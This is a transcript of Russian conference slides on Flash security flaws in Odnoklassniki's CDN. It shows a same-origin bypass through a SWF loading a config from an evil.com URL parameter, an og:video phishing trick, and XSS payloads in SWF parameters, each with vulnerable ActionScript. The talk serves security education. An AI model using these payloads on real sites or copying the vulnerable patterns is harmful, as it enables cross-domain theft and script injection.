Transcript
Flash умер. Да здравствует Flash!
Александра Сватикова Одноклассники
Модель безопасности Flash
• Application sandbox
• Security domain / application domain
#1 Same-Origin Policy bypass
http://st.mycdn.me/vulnerable.swf?conf=config.swf
Jakub Żoczek (@zoczus)
loader.load(new URLRequest(loaderInfo.parameters.conf), new LoaderContext(false, new ApplicationDomain(), SecurityDomain.currentDomain)); !addChild(loader);
#1 Same-Origin Policy bypass
http://st.mycdn.me/vulnerable.swf?conf=http://evil.com/config.swf
Jakub Żoczek (@zoczus)
http://st.mycdn.me/vulnerable.swf?conf=config.swf
loader.load(new URLRequest(loaderInfo.parameters.conf), new LoaderContext(false, new ApplicationDomain(), SecurityDomain.currentDomain)); !addChild(loader);
#1 Same-Origin Policy bypass
evil.com mycdn.me
Jakub Żoczek (@zoczus)
http://st.mycdn.me/vulnerable.swf?conf=config.swf
loader.load(new URLRequest(loaderInfo.parameters.conf), new LoaderContext(false, new ApplicationDomain(), SecurityDomain.currentDomain)); !addChild(loader);
#1 Same-Origin Policy bypassJakub Żoczek (@zoczus)
http://ok.ru/crossdomain.xml
<cross-domain-policy> ... <allow-access-from domain="st.mycdn.me"/> <allow-access-from domain="ok.ru"/> <allow-access-from domain="*.ok.ru"/> ... </cross-domain-policy>
#1 Same-Origin Policy bypassJakub Żoczek (@zoczus)
http://ok.ru/crossdomain.xml
evil.com ok.ru
<cross-domain-policy> ... <allow-access-from domain="st.mycdn.me"/> <allow-access-from domain="ok.ru"/> <allow-access-from domain="*.ok.ru"/> ... </cross-domain-policy>
#2 Phishing… <meta property=“og:video" content=“http://tv.ru/player.swf?conf=http://tv.ru/config.swf” > …
#2 Phishing<meta property=“og:video" content=“http://tv.ru/player.swf?conf=http://tv.ru/config.swf” >
<meta property=“og:video" content=“http://tv.ru/player.swf? conf=http://tv.ru.evil.com/config.swf” >
#2 Phishing<meta property=“og:video" content=“http://tv.ru/player.swf? conf=http://tv.ru.evil.com/config.swf” >
#3 XSS in CDN domainhttp://st.mycdn.me/vulnerable.swf?param=username
_root.createTextField("Inputbox",0,20,20,320,240); _root.Inputbox.html=true; _root.Inputbox.htmlText=“Welcome " + _root.param;
http://st.mycdn.me/vulnerable.swf?param=<script>alert(‘xss’)</script>
#3 XSS in CDN domain
$ host st.mycdn.me st.mycdn.me has address 217.20.152.226 $ $ host videoplayer.ok.ru videoplayer.ok.ru is an alias for st.mycdn.me. videoplayer.ok.ru has address 217.20.152.226
#3 XSS in CDN domain
$ host st.mycdn.me st.mycdn.me has address 217.20.152.226 $ $ host videoplayer.ok.ru videoplayer.ok.ru is an alias for st.mycdn.me. videoplayer.ok.ru has address 217.20.152.226
http://videoplayer.ok.ru/vulnerable.swf?param=alert(‘xss’)
Спасибо за внимание!
top related